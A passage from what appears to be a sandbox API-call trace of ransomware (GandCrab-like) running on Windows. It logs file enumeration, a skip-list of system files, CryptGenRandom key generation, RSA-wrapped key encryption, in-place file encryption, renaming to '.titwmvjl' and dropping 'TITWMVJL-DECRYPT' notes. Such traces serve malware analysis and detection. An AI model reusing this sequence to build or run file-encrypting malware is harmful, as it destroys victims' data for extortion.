x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.803] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0079.804] CloseHandle (hObject=0x2c4) returned 1 [0079.805] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.805] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.805] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0x7c)) [0079.805] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.806] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.806] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.806] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a09d2ca4deb61a.lock") returned 85 [0079.806] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\startup\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0079.807] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.807] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.807] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 61 [0079.807] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0079.807] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5036f8 [0079.808] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.808] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.808] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.808] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.808] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.808] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.808] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.808] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a09d2ca4deb61a.lock" [0079.808] lstrlenW (lpString=".titwmvjl") returned 9 [0079.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a09d2ca4deb61a.lock") returned 85 [0079.809] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.809] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 94 [0079.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a09d2ca4deb61a.lock") returned 85 [0079.809] lstrlenW (lpString=".lock") returned 5 [0079.809] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.809] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.809] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.809] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.810] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.810] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.810] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.810] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\TITWMVJL-DECRYPT.txt" [0079.810] lstrlenW (lpString=".titwmvjl") returned 9 [0079.810] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\TITWMVJL-DECRYPT.txt") returned 81 [0079.810] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.810] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 90 [0079.810] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\TITWMVJL-DECRYPT.txt") returned 81 [0079.810] lstrlenW (lpString=".txt") returned 4 [0079.810] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.810] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.810] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.811] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.811] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\TITWMVJL-DECRYPT.txt") returned 81 [0079.811] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\TITWMVJL-DECRYPT.txt") returned 81 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.811] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.811] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.811] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0079.811] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0079.812] CloseHandle (hObject=0x2c4) returned 1 [0079.812] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.812] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.812] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.812] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\TITWMVJL-DECRYPT.txt" [0079.813] lstrlenW (lpString=".titwmvjl") returned 9 [0079.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\TITWMVJL-DECRYPT.txt") returned 73 [0079.813] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.813] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 82 [0079.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\TITWMVJL-DECRYPT.txt") returned 73 [0079.813] lstrlenW (lpString=".txt") returned 4 [0079.813] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.813] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.813] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.813] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\TITWMVJL-DECRYPT.txt") returned 73 [0079.814] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\TITWMVJL-DECRYPT.txt") returned 73 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.814] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.814] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.814] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0079.814] FindClose (in: hFindFile=0x5037f8 | out: hFindFile=0x5037f8) returned 1 [0079.815] CloseHandle (hObject=0x2bc) returned 1 [0079.815] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0079.815] FindClose (in: hFindFile=0x503378 | out: hFindFile=0x503378) returned 1 [0079.816] CloseHandle (hObject=0x2b4) returned 1 [0079.817] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0079.817] lstrcmpW (lpString1="MlklbQx-e.bmp", lpString2=".") returned 1 [0079.817] lstrcmpW (lpString1="MlklbQx-e.bmp", lpString2="..") returned 1 [0079.817] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="MlklbQx-e.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp" [0079.817] lstrlenW (lpString=".titwmvjl") returned 9 [0079.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp") returned 51 [0079.817] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.817] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp.titwmvjl") returned 60 [0079.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp") returned 51 [0079.817] lstrlenW (lpString=".bmp") returned 4 [0079.817] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.817] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0079.817] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0079.817] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.818] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp") returned 51 [0079.818] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp") returned 51 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="desktop.ini") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="autorun.inf") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="ntuser.dat") returned -1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="iconcache.db") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="bootsect.bak") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="boot.ini") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="ntuser.dat.log") returned -1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="thumbs.db") returned -1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="ntldr") returned -1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="NTDETECT.COM") returned -1 [0079.818] lstrcmpiW (lpString1="MlklbQx-e.bmp", lpString2="Bootfont.bin") returned 1 [0079.818] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp") returned 51 [0079.818] lstrlenW (lpString=".bmp") returned 4 [0079.819] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.819] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".bmp ") returned 5 [0079.819] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.819] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.819] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mlklbqx-e.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0079.820] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.820] ReadFile (in: hFile=0x2b4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0079.821] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.821] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0079.824] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.825] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.825] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.825] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0079.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.825] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.825] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.826] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4cdb38) returned 1 [0079.829] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.829] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.830] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.830] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0079.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.830] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.830] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.830] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0079.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.833] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0079.834] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.834] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0079.834] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.834] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259f130*=0x100) returned 1 [0079.835] GetLastError () returned 0x0 [0079.835] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.835] CryptDestroyKey (hKey=0x503578) returned 1 [0079.835] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.835] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.835] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.835] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4cdb38) returned 1 [0079.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.839] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503638) returned 1 [0079.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.839] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0079.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.839] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259f130*=0x100) returned 1 [0079.839] GetLastError () returned 0x0 [0079.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.840] CryptDestroyKey (hKey=0x503638) returned 1 [0079.840] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.840] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.840] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.840] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.840] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x10f65, lpOverlapped=0x0) returned 1 [0079.853] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffef09b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.853] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10f65, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x10f65, lpOverlapped=0x0) returned 1 [0079.857] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0079.866] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.870] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.871] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.871] CloseHandle (hObject=0x2b4) returned 1 [0079.873] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mlklbqx-e.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MlklbQx-e.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mlklbqx-e.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0079.874] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.874] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0079.874] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0079.874] 